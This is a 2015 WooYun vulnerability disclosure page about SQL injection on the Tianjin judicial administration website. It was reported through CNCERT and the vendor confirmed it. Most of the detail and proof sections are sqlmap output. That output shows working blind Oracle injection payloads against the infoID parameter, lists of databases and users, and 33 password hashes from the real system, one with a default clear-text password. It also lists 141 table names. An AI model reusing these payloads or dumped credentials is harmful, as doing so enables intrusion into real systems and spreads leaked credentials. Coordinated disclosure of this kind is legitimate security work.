当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137623

漏洞标题:天津司法行政信息网SQL注入一枚(泄露网站大量重要信息)

相关厂商:天津司法行政信息网

漏洞作者: 泪雨无魂

提交时间:2015-08-30 17:45

修复时间:2015-10-17 10:46

公开时间:2015-10-17 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-30: 细节已通知厂商并且等待厂商处理中
2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

天津司法行政信息网SQL注入漏洞,网站20个数据库,泄露大量重要信息。。。

详细说明:

注入点:http://**.**.**.**/tianjinlawyermanager/justice/guide/show.jsp?infoID=IC02000007421
一共20个数据库,多大33个用户。。。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: infoID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infoID=IC02000007421' AND 7744=7744 AND 'gyBY'='gyBY
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infoID=IC02000007421' AND 8499=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||C
HR(122)||CHR(65)||CHR(118),5) AND 'QcRf'='QcRf
---
[09:21:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
database management system users [33]:
[*] ANONYMOUS
[*] APEX_PUBLIC_USER
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] DIP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XS$NULL
current schema (equivalent to database on Oracle):    'DEVPRO'
current user:    'DEVPRO'
database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] APEX_PUBLIC_USER [1]:
    password hash: EE57D9237462E876
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
    password hash: E17E157AE6250346
[*] DEVADMIN [1]:
    password hash: DCC51D6C3B2EB8E4
[*] DEVPRO [1]:
    password hash: 02F4A8CEEDB59DC1
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] FLOWS_030000 [1]:
    password hash: E17C97E4DF430B40
[*] FLOWS_FILES [1]:
    password hash: D0D249432624C419
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
    password hash: 861F077E65847323
[*] OLAPSYS [1]:
    password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
    password hash: 6D17CF1EB1611F94
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] OWBSYS [1]:
    password hash: 610A3C38F301776F
[*] SCOTT [1]:
    password hash: F894844C34402B67
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SPATIAL_CSW_ADMIN_USR [1]:
    password hash: 1B290858DD14107E
[*] SPATIAL_WFS_ADMIN_USR [1]:
    password hash: 7117215D6BEE6E82
[*] SYS [1]:
    password hash: 23A28F7C8B7141A5
[*] SYSMAN [1]:
    password hash: 9E980554E6613152
[*] SYSTEM [1]:
    password hash: AAF56808716F3847
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] WK_TEST [1]:
    password hash: 29802572EB547DBF
[*] WKPROXY [1]:
    password hash: B97545C4DD2ABE54
[*] WKSYS [1]:
    password hash: 69ED49EE1851900D
    clear-text password: CHANGE_ON_INSTALL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XS$NULL [1]:
    password hash: DC4FCC8CB69A6733
Database: DEVPRO
[141 tables]
+--------------------------------+
| BAK_TLA_PERSON45               |
| BAK_TLA_STAT1_OPERATION        |
| BAK_TLA_STAT2_OPERATION        |
| BROAD_DATUM                    |
| BROAD_PAWN                     |
| DOSS_CASE_GG                   |
| DOSS_CASE_YZSB                 |
| FARE_DERATE_D                  |
| FARE_DERATE_L                  |
| FARE_DETAIL_GG                 |
| LM_COMPLAIN                    |
| LODGE_RESULT                   |
| PAPER                          |
| PAWNER                         |
| PAWN_LOG                       |
| REPORT_LOG                     |
| TEST                           |
| TLA_ANSWER                     |
| TLA_APPLICATION                |
| TLA_APPREMARK                  |
| TLA_BBS                        |
| TLA_CASEREASON                 |
| TLA_CERTIFICATE                |
| TLA_CHANGEADDRAPP              |
| TLA_CHANGEDIRAPP               |
| TLA_CHANGEFORMAPP              |
| TLA_CHANGENAMEAPP              |
| TLA_CITY                       |
| TLA_COMPLAIN                   |
| TLA_FORUM                      |
| TLA_FORUM_CATEGORY             |
| TLA_FORUM_CATEGORY_LEVEL       |
| TLA_GOODFRIEND                 |
| TLA_HONOR                      |
| TLA_INFO                       |
| TLA_INFOANNEX                  |
| TLA_INFOCATEGORY               |
| TLA_INFOIMAGES                 |
| TLA_INFOSEND                   |
| TLA_INFOWEB                    |
| TLA_INVITEPERSON               |
| TLA_LAWOFFICE                  |
| TLA_LAWOFFICEBRANCH            |
| TLA_LAWOFFICEBRANCHAPP         |
| TLA_LAWPARTNER                 |
| TLA_LICENCEEXP                 |
| TLA_MANAGER_MODULE_2           |
| TLA_MANAGER_MODULE_CATEGORY_2  |
| TLA_MANAGER_MODULE_CHARACTER_2 |
| TLA_MANAGER_ROLE_2             |
| TLA_MANAGER_R_M_2              |
| TLA_MANAGER_USER_2             |
| TLA_MANAGER_U_M_2              |
| TLA_MANAGER_U_R_2              |
| TLA_MYMODULE                   |
| TLA_NAME_APPLY                 |
| TLA_NAME_APPLY_CHILD           |
| TLA_NEWLAWOFFICEAPP            |
| TLA_OFFICEINITIATOR            |
| TLA_PARTNERAPP                 |
| TLA_PERSON                     |
| TLA_PERSONAPP                  |
| TLA_PUNISH                     |
| TLA_REASONRECORD               |
| TLA_REASONRECORD_COMPLAIN      |
| TLA_REWARDS_PUNISH             |
| TLA_SMS                        |
| TLA_STAT1_OPERATION            |
| TLA_STAT2_OPERATION            |
| TLA_STAT3_ORGAN                |
| TLA_STAT4_LAWYER               |
| TLA_STAT5_ASSISTANT            |
| TLA_STAT6_OPERATION            |
| TLA_STUDYEXP                   |
| TLA_WORKEXP                    |
| TLA_YEARCHECK                  |
| TMP_BROAD_DATUM                |
| TMP_BROAD_PAWN                 |
| TMP_DOSS_CASE_YZSB             |
| TMP_TYPESLIST                  |
| TMP_TYPESLISTCENBOW            |
| TMP_ZY                         |
| TNA_ANSWER                     |
| TNA_ASSESSMENT                 |
| TNA_BENEFIT                    |
| TNA_BROAD_DATUM                |
| TNA_BROAD_PAWN                 |
| TNA_CASE                       |
| TNA_CASEBACKUP                 |
| TNA_CASECOUNTERPART            |
| TNA_COMPENSATION               |
| TNA_COMPLAIN                   |
| TNA_CONTRIBUTIONS              |
| TNA_DIRECTORTEL                |
| TNA_DOSS_CASE_YZSB             |
| TNA_EXECUTIVES                 |
| TNA_FALSEPAPERS                |
| TNA_FREMDNESSNOTARIZATION      |
| TNA_GOODFRIEND                 |
| TNA_GREFFIERSTATISTICS         |
| TNA_HONORPUNISH                |
| TNA_INFO                       |
| TNA_INFOANNEX                  |
| TNA_INFOCATEGORY               |
| TNA_INFOIMAGES                 |
| TNA_INFOWEB                    |
| TNA_INNERNOTARIZATION          |
| TNA_MANAGER_MODULE_2           |
| TNA_MANAGER_MODULE_CATEGORY_2  |
| TNA_MANAGER_MODULE_CHARACTER_2 |
| TNA_MANAGER_ROLE_2             |
| TNA_MANAGER_R_M_2              |
| TNA_MANAGER_USER_2             |
| TNA_MANAGER_U_M_2              |
| TNA_MANAGER_U_R_2              |
| TNA_MATTERS_GATMD              |
| TNA_MATTERS_GZC                |
| TNA_MATTERS_SFJ                |
| TNA_MATTERS_SWGJ               |
| TNA_MATTERS_SWMD               |
| TNA_MORTAGAGE                  |
| TNA_NOTARIES                   |
| TNA_NOTARIZATIONCHARGE         |
| TNA_ORGAN                      |
| TNA_ORGANSTATISTICS            |
| TNA_PERSONEDIT                 |
| TNA_REMOVENOTAR                |
| TNA_REPORT_BZJG                |
| TNA_SEFCOUNTERPART             |
| TNA_SENDRECEIPT                |
| TNA_SMS                        |
| TNA_SORTTINGGGC                |
| TNA_SORTTINGGZC                |
| TNA_SORTTINGSFB                |
| TNA_SPECIALPAPERMANAGER        |
| TNA_TAIWANCOUNTERPART          |
| TNA_TAIWANHONGKONG             |
| TNA_TESTAMENT                  |
| TNA_TWCHECKCOUNTERPART         |
| TNA_UPLOADRECORD               |
| YZCX_LOG                       |
+--------------------------------+


2.png

3.png

43.png

4.png

5.png

6.png

漏洞证明:

available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
database management system users [33]:
[*] ANONYMOUS
[*] APEX_PUBLIC_USER
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] DIP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XS$NULL
current schema (equivalent to database on Oracle):    'DEVPRO'
current user:    'DEVPRO'
database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] APEX_PUBLIC_USER [1]:
    password hash: EE57D9237462E876
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
    password hash: E17E157AE6250346
[*] DEVADMIN [1]:
    password hash: DCC51D6C3B2EB8E4
[*] DEVPRO [1]:
    password hash: 02F4A8CEEDB59DC1
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] FLOWS_030000 [1]:
    password hash: E17C97E4DF430B40
[*] FLOWS_FILES [1]:
    password hash: D0D249432624C419
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
    password hash: 861F077E65847323
[*] OLAPSYS [1]:
    password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
    password hash: 6D17CF1EB1611F94
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] OWBSYS [1]:
    password hash: 610A3C38F301776F
[*] SCOTT [1]:
    password hash: F894844C34402B67
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SPATIAL_CSW_ADMIN_USR [1]:
    password hash: 1B290858DD14107E
[*] SPATIAL_WFS_ADMIN_USR [1]:
    password hash: 7117215D6BEE6E82
[*] SYS [1]:
    password hash: 23A28F7C8B7141A5
[*] SYSMAN [1]:
    password hash: 9E980554E6613152
[*] SYSTEM [1]:
    password hash: AAF56808716F3847
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] WK_TEST [1]:
    password hash: 29802572EB547DBF
[*] WKPROXY [1]:
    password hash: B97545C4DD2ABE54
[*] WKSYS [1]:
    password hash: 69ED49EE1851900D
    clear-text password: CHANGE_ON_INSTALL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XS$NULL [1]:
    password hash: DC4FCC8CB69A6733


6.png

322.jpg

211.png

6.png

修复方案:

你懂的。。。

版权声明:转载请注明来源 泪雨无魂@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-02 10:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给天津分中心,由其后续协调网站管理单位处置。

最新状态:

暂无